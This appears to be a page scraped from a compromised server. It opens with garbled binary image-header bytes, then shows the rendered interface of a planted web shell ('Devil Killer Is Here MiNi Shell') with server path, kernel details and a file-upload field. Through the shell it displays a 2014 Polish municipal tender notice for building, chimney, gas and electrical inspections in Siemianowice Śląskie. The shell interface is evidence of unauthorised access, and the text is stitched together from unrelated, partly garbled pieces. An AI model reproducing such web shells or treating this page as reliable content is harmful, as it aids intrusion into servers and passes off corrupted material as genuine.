JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140606/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140606/192408-N-2014.html

<p class="kh_header"><b>Siemianowice Śląskie: Wykonanie przeglądów w budynkach stanowiących zasób 
Gminy Siemianowice Śląskie.</b><br>
<b>Numer ogłoszenia: 192408 - 2014; data zamieszczenia: 06.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina  Siemianowice  Śląskie , ul. Jana Pawła II 10, 41-100 Siemianowice Śląskie, woj. śląskie, tel. 32 7605200, faks 32 7605280.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.siemianowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie przeglądów w budynkach stanowiących zasób 
Gminy Siemianowice Śląskie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie przeglądów  w budynkach stanowiących zasób Gminy Siemianowice Śląskie zgodnie z zakresem określonym w art. 62 ust 1 c) oraz art. 62 ust. 2  ustawy z dnia 07.07. 1994 r. Prawo budowlane (tj. Dz.U. 2013 poz.1409 z późn. zm., dalej również: Pb).
Zamówienie zostało podzielone na 4 Części. Prowadzący postępowanie dopuszcza możliwość składania ofert częściowych na jedną lub więcej części zamówienia:
Część I 
Wykonanie rocznej kontroli stanu technicznego budynków stanowiących zasób Gminy Siemianowice Śląskie.
Zakres kontroli obejmuje:
Wykonanie rocznej kontroli obejmującej sprawdzenie stanu technicznego elementów budynków narażonych na szkodliwe wpływy atmosferyczne i niszczące działania czynników występujących podczas użytkowania obiektu.
Przeglądy powinny zostać sporządzone na karcie przeglądu stanu użytkowej obiektu stanowiący dodatek nr 10/1 do SIWZ.
 Wykaz budynków do wykonania przeglądów rocznych budowlanych na poszczególnych administracjach  stanowi  Dodatek nr 8/1 do SIWZ.
Część II
Wykonanie kontroli obejmującej sprawdzenie stanu technicznego przewodów kominowych w budynkach stanowiących zasób Gminy Siemianowice Śląskie.
Zakres prac obejmuje:
1).sprawdzenie drożności  i szczelności przewodów kominowych,
2).sprawdzenie siły ciągu kominowego (ciśnienia) zapewniającego prawidłowe działanie podłączonych przewodów urządzeń dymowych, spalinowych i wentylacyjnych,
3).sprawdzenie czy występują uszkodzenia przewodów kominowych na całej ich długości, kanałów, czopuchów, rur i łączników, włazów, drabin, drzwiczek kominowych (rewizyjnych-wyciorowych), ław kominowych, nasad kominowych,
4).sprawdzenie czy występuje dogodny dostęp do czyszczenia i przeprowadzenia okresowych kontroli przewodów kominowych  i urządzeń mających związek z kominami,
5).sprawdzenie czy w pomieszczeniach w których zainstalowane są urządzenia grzewcze (trzony kuchenne, piecyki wody przepływowej, kotły CO itp.), posiadają sprawne działające urządzenia wentylacyjne w tym: nawiewne i wywiewne,
6).sprawdzenie czy występują inne stwierdzone w trakcie kontroli rażące nieprawidłowości (uchybienia) mogące spowodować zagrożenie bezpieczeństwa ludzi i mienia
7). Przed przystąpieniem do przeglądu Wykonawca po uzgodnieniu z Prowadzącym postępowanie wykona oraz rozwiesi ogłoszenia o konieczności udostępnienia przez lokatorów lokali mieszkalnych, w których powinna być przeprowadzona kontrola.
8). W razie nieobecności lokatorów w mieszkaniu czynności kontrolne należy ponowić do dwóch razy. Za trzecim razem należy zgłosić administracji informację o nieudanym wykonaniu kontroli w danym lokalu oraz przedłożyć wykaz osób wraz z terminem kolejnej kontroli. Administracja natomiast powiadomi lokatora listem poleconym o kolejnym terminie przeprowadzenia kontroli.
9). Wykonawcy przysługuje wynagrodzenie jedynie za faktycznie wykonane przeglądy,      tj. za wykonanie przeglądu po udostępnieniu przez lokatorów lokali mieszkalnych. Wykonawcy nie przysługuje wynagrodzenie za przegląd  w tych lokalach mieszkalnych w których kontroli z jakiejkolwiek przyczyny nie przeprowadzono, niezależnie od tego, czy Wykonawca pozostawał w gotowości wykonania takiego przeglądu. Wykonanie kontroli w lokalu mieszkalnym musi być potwierdzone czytelnym  podpisem lokatora złożonym na protokole kontroli.
Przeglądy powinny zostać sporządzone na  protokole z okresowej kontroli przewodów kominowych stanowiący dodatek nr 10/2 do SIWZ, w dwóch egzemplarzach (oryginału i kopii).
Wykaz budynków do wykonania przeglądów  kominiarskich na poszczególnych administracjach  stanowi Dodatek nr 8/2 do SIWZ
Część III
Wykonanie kontroli obejmującej sprawdzenie stanu technicznego instalacji gazowych wraz       z wykonaniem prób szczelności w budynkach stanowiących zasób Gminy Siemianowice Śląskie.
Zakres kontroli obejmuje:
1.Wykonanie przeglądu instalacji gazowej od kurka głównego do urządzeń gazowych,
2.Wykonanie prób szczelności instalacji gazowej za gazomierzem - w lokalach mieszkalnych i użytkowych  w danym budynku,
3.Wykonanie kontroli obejmującej sprawdzenie stanu technicznego instalacji gazowej w lokalach mieszkalnych w których został odcięty dopływ gazu (bez uszczelnienia)
4.Wykonanie próby szczelności instalacji gazowej przed gazomierzem w budynku mieszkalnym (część wspólnych instalacji- od kurka głównego do gazomierza):
-w przypadku stwierdzenia nieszczelności instalacji wewnętrznej gazu w lokalu mieszkalnym należy umówić się z lokatorem na termin i wykonać jej uszczelnienia wraz z ewentualną konieczną wymianą niezbędnych elementów instalacji tj. zawory, kształtki, podejścia zgodnie z istniejącymi średnicami.
-w przypadku stwierdzenia nieszczelności przy gazomierzu należy wykonać uszczelnienie instalacji do 48 godzin od stwierdzenia nieszczelności. Koszty związane z demontażem i montażem gazomierza ponosi Prowadzący Postępowanie.
-w przypadku stwierdzenia nieszczelności urządzeń odbiorczych w lokalu mieszkalnym takich jak kuchenka 4-palnikowa, przepływowe podgrzewacze wody i piece c.o. należy odciąć przy urządzeniu dopływ gazu na zaworze. Naprawa lub wymiana w/w urządzenia należy do obowiązków lokatora.
-w przypadku stwierdzenia nieszczelności instalacji części wspólnych tj. poziomów i pionów budynku mieszkalnego należy wykonać ich uszczelnienie do 48 godzin od stwierdzenia nieszczelności. 
-w przypadku stwierdzenia wymiany odcinka rur w związku ze złym stanem technicznym  (tj. korozja, pęknięcia) należy powiadomić Prowadzącego postępowanie odrębnym protokołem. Wymiana odcinka rur  należy do obowiązków Prowadzącego Postępowanie. 
-w przypadku stwierdzenia nieszczelności zagrażającej zdrowiu i życiu ludzi należy natychmiastowo odciąć dopływ gazu bądź usunąć nieszczelność.
5.Przed przystąpieniem do przeglądu Wykonawca po uzgodnieniu z Prowadzącym postępowanie wykona oraz rozwiesi ogłoszenia o konieczności udostępnienia przez lokatorów lokali mieszkalnych, w których powinna być przeprowadzona kontrola.
6.W razie nieobecności lokatorów w mieszkaniu czynności kontrolne należy ponowić do dwóch razy. Za trzecim razem należy zgłosić administracji informację o nieudanym wykonaniu kontroli w danym lokalu oraz przedłożyć wykaz osób wraz z terminem kolejnej kontroli. Administracja natomiast powiadomi lokatora listem poleconym o kolejnym terminie przeprowadzenia kontroli.
7.Wykonawcy przysługuje wynagrodzenie jedynie za faktycznie wykonane przeglądy, tj. za wykonanie przeglądu po udostępnieniu przez lokatorów lokali mieszkalnych. Wykonawcy nie przysługuje wynagrodzenie za przegląd  w tych lokalach mieszkalnych w których kontroli z jakiejkolwiek przyczyny nie przeprowadzono, niezależnie od tego, czy Wykonawca pozostawał w gotowości wykonania takiego przeglądu. Wykonanie kontroli w lokalu mieszkalnym musi być potwierdzone czytelnym  podpisem lokatora złożonym na protokole kontroli.
8.Prowadzący postępowanie nie ponosi żadnej odpowiedzialności jeżeli przeglądy będą mogły być wykonane jedynie w części lokali wskazanych w Dodatku 8/3 do SIWZ. Wykonawcy przysługuje wynagrodzenie jedynie za faktycznie wykonane przeglądy, tj. za wykonanie przeglądu po udostępnieniu przez lokatorów lokali mieszkalnych. Wykonawcy nie przysługuje wynagrodzenie za przegląd instalacji w tych lokalach mieszkalnych, w których kontroli z jakiejkolwiek przyczyny nie przeprowadzono, niezależnie od tego, czy Wykonawca pozostawał w gotowości wykonania takiego przeglądu.
Przeglądy powinny zostać sporządzone na protokole przeglądu instalacji gazowej stanowiący dodatek nr 10/3 do SIWZ, w dwóch egzemplarzach (oryginału i kopii).
Wykaz budynków do wykonania przeglądów gazowych na poszczególnych administracjach   stanowi Dodatek nr 8/3 do SIWZ
Część IV
Wykonanie pięcioletniej kontroli obejmującej badanie instalacji elektrycznej i piorunochronnej w zakresie stanu sprawności połączeń, osprzętu, zabezpieczeń i środków ochrony od porażeń, oporności izolacji przewodów oraz uziemień instalacji i aparatów.
Zakres kontroli obejmuje: 
1.Kontrolę instalacji elektrycznej w lokalach mieszkalnych, 
2.Kontrolę instalacji elektrycznej oświetlenia administracyjnego ( klatka schodowa, strych, piwnice, pomieszczenia WC poza lokalem),
3.Kontrolę instalacji elektrycznej wewnętrznej linii zasilającej (wlz) w klatce schodowej, 
4.Kontrolę instalacji piorunochronnej obiektu (budynku) zgodnie z wymogami normy PN-ICE 61024-1 ochrona odgromowa obiektów. 
5.Oględziny w zakresie ochrony przed dotykiem bezpośrednim i ochrony przeciwpożarowej, pomiary rezystancji izolacji, 
6.Badanie ciągłości przewodów ochronnych, badania przed dotykiem pośrednim, próby działania urządzeń różnicowoprądowych, 
7.Kontrolę instalacji elektrycznej w lokalach mieszkalnych, tablic elektrycznych w mieszkaniach, sprawdzenie stanu technicznego wkładek topikowych lub wyłączników nadmiaromo-prądowych i wyłączników różnicoprądowych, 
8.Sprawdzenie tablic licznikowych i licznika, sprawdzenie stanu gniazdek wtyczkowych i wyłączników, ciągłość przewodów ochronnych w tym połączeń wyrównawczych.
9.Przed przystąpieniem do przeglądu Wykonawca po uzgodnieniu z Prowadzącym postępowanie wykona oraz rozwiesi ogłoszenia o konieczności udostępnienia przez lokatorów lokali mieszkalnych, w których powinna być przeprowadzona kontrola.
10.W razie nieobecności lokatorów w mieszkaniu czynności kontrolne należy ponowić do dwóch razy. Za trzecim razem należy zgłosić administracji informację o nieudanym wykonaniu kontroli w danym lokalu oraz przedłożyć wykaz osób wraz z terminem kolejnej kontroli. Administracja natomiast powiadomi lokatora listem poleconym o kolejnym terminie przeprowadzenia kontroli.
11.Wykonawcy przysługuje wynagrodzenie jedynie za faktycznie wykonane przeglądy, tj. za wykonanie przeglądu po udostępnieniu przez lokatorów lokali mieszkalnych. Wykonawcy nie przysługuje wynagrodzenie za przegląd  w tych lokalach mieszkalnych w których kontroli z jakiejkolwiek przyczyny nie przeprowadzono, niezależnie od tego, czy Wykonawca pozostawał w gotowości wykonania takiego przeglądu. Wykonanie kontroli w lokalu mieszkalnym musi być potwierdzone czytelnym  podpisem lokatora złożonym na protokole kontroli.
12.Prowadzący postępowanie nie ponosi żadnej odpowiedzialności jeżeli przeglądy będą mogły być wykonane jedynie w części lokali wskazanych w Dodatku 8/4 do SIWZ. Wykonawcy przysługuje wynagrodzenie jedynie za faktycznie wykonane przeglądy, tj. za wykonanie przeglądu po udostępnieniu przez lokatorów lokali mieszkalnych. Wykonawcy nie przysługuje wynagrodzenie za przegląd instalacji w tych lokalach mieszkalnych, w których kontroli z jakiejkolwiek przyczyny nie przeprowadzono, niezależnie od tego, czy Wykonawca pozostawał w gotowości wykonania takiego przeglądu.
13.Przeprowadzenie w/w kontroli ma na celu sprawdzenie czy w trakcie eksploatacji stan techniczny instalacji lub urządzeń elektrycznych nie uległ pogorszeniu w stopniu stwarzającym zagrożenie dla ich dalszego bezpiecznego użytkowania, oraz czy ich dalsze  użytkowanie zapewnia ochronę interesów użytkowników innych lokali korzystających z tej instalacji oraz osób trzecich.
Przeglądy powinny zostać sporządzone na protokołach przeglądu instalacji elektrycznej stanowiący dodatek nr 10/4 do SIWZ, w dwóch egzemplarzach (oryginału i kopii).
Wykaz budynków do wykonania przeglądów pięcioletnich elektrycznych na poszczególnych administracjach   stanowi Dodatek nr 8/4 do SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.35.61.00-9, 71.31.54.00-3, 71.70.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Prowadzący postępowanie nie wymaga zabezpieczenia należytego wykonania umowy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.1. w odniesieniu do Części I :
Wykonawca musi wykazać, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał :
- co najmniej 3 usługi polegające na  sprawdzeniu stanu technicznego elementów budynku narażonych na szkodliwe wpływy atmosferyczne i niszczące działania czynników występujących podczas użytkowania obiektu o których mowa w art. 62 ust 1 pkt. 1a  Prawa Budowlanego  z których każda  była/jest świadczona nieprzerwanie przez okres co najmniej 12 miesięcy i wartości każdej z tych usług wynosi co najmniej 25.000 zł brutto w ramach jednej umowy
2.2 w odniesieniu do Części II :
Wykonawca musi wykazać, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał:
- co najmniej 3 usługi polegające na wykonywaniu kontroli stanu technicznego przewodów kominowych (np. dymowych,  spalinowych,  wentylacyjnych) podczas użytkowania obiektu  o których mowa w art. 62  ust 1 pkt 1 lit  c Prawa Budowlanego z których każda  była/jest świadczona nieprzerwanie przez okres co najmniej 12 miesięcy i wartości każdej z tych usług wynosi co najmniej 20.000 zł brutto w ramach jednej umowy
2.3 w odniesieniu do Części III :
Wykonawca musi wykazać, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał:
- co najmniej 3 usługi polegające na wykonywaniu kontroli stanu technicznego instalacji gazowych  podczas użytkowania obiektu o których mowa w art. 62  ust 1 pkt 1 lit c Prawa Budowlanego z których każda  była/jest świadczona nieprzerwanie przez okres co najmniej 12 miesięcy i wartości każdej z tych usług wynosi co najmniej 30.000 zł brutto w ramach jednej umowy
2.4 w odniesieniu do Części IV:
Wykonawca musi wykazać, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał:
-co najmniej 3 usługi polegające na wykonaniu kontroli obejmującej badanie instalacji elektrycznej i piorunochronnej w zakresie stanu sprawności połączeń, osprzętu, zabezpieczeń i środków ochrony od porażeń, oporności izolacji przewodów oraz uziemień instalacji i aparatów, z których każda  była/jest świadczona nieprzerwanie przez okres co najmniej 12 miesięcy i wartości każdej z tych usług wynosi co najmniej 15.000 zł brutto w ramach jednej umowy
2. Ocena spełniania warunków udziału w postępowaniu nastąpi na podstawie wymienionych w pkt. VI dokumentów i oświadczeń złożonych przez wykonawcę wraz z ofertą.
 3. Oświadczenia i dokumenty będą oceniane pod względem formalno-prawnym, pod względem ich aktualności i treści, a także, pod katem potwierdzania przez informacje  w nich zawarte spełniania przez wykonawcę warunków udziału w postępowaniu
4. Sposób oceny spełniania warunków wymaganych od wykonawców będzie zgodny z formułą spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3.1 w odniesieniu do Części I :
Wykonawca winien wykazać, że dysponuje:
- co najmniej 3 osobami z których każda posiada kwalifikacje zawodowe, tj. uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej, wydane na podstawie ustawy z dnia 7 lipca 1994r. Prawo budowlane (tj. Dz. z 2013r. poz.1409 z późn. zm) lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów;
3.2 w odniesieniu do Części II :
Wykonawca winien wykazać, że dysponuje:
- co najmniej 3 osobami z których każda posiada kwalifikacje mistrza w rzemiośle kominiarskim uprawniające do kontroli stanu technicznego przewodów kominowych zgodnie z wymogami  art. 62 ust. 6 pkt 1 ustawy Prawo budowlane.
3.3 w odniesieniu do Części III :
Wykonawca winien wykazać, że dysponuje:
-co najmniej 3 osobami z których każda posiada kwalifikacje wymagane przy wykonywaniu dozoru nad eksploatacją urządzeń, instalacji oraz sieci gazowych, wydane na podstawie ustawy z dnia 7 lipca 1994r. Prawo budowlane (j.t. Dz. U. 2013., poz. 1409 z póź zm.) lub odpowiadające im ważne  uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
3.4 w odniesieniu do Części IV
Wykonawca winien wykazać, że dysponuje:
- co najmniej 3 osobami z których każda posiada kwalifikacje wymagane przy wykonywaniu dozoru nad eksploatacją urządzeń, instalacji oraz sieci energetycznych wydane na podstawie ustawy z dnia 7 lipca 1994r. Prawo budowlane (j.t. Dz. U. 2013., poz. 1409 z póź zm.) lub odpowiadające im ważne  uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
2. Ocena spełniania warunków udziału w postępowaniu nastąpi na podstawie wymienionych w pkt. VI dokumentów i oświadczeń złożonych przez wykonawcę wraz z ofertą.
 3. Oświadczenia i dokumenty będą oceniane pod względem formalno-prawnym, pod względem ich aktualności i treści, a także, pod katem potwierdzania przez informacje  w nich zawarte spełniania przez wykonawcę warunków udziału w postępowaniu
4. Sposób oceny spełniania warunków wymaganych od wykonawców będzie zgodny z formułą spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W odniesieniu do Części I, Części II, Części III, Części IV
Wykonawca musi posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejsza niż 50.000,00 zł 
2. Ocena spełniania warunków udziału w postępowaniu nastąpi na podstawie wymienionych w pkt. VI dokumentów i oświadczeń złożonych przez wykonawcę wraz z ofertą.
 3. Oświadczenia i dokumenty będą oceniane pod względem formalno-prawnym, pod względem ich aktualności i treści, a także, pod katem potwierdzania przez informacje  w nich zawarte spełniania przez wykonawcę warunków udziału w postępowaniu
4. Sposób oceny spełniania warunków wymaganych od wykonawców będzie zgodny z formułą spełnia/ nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

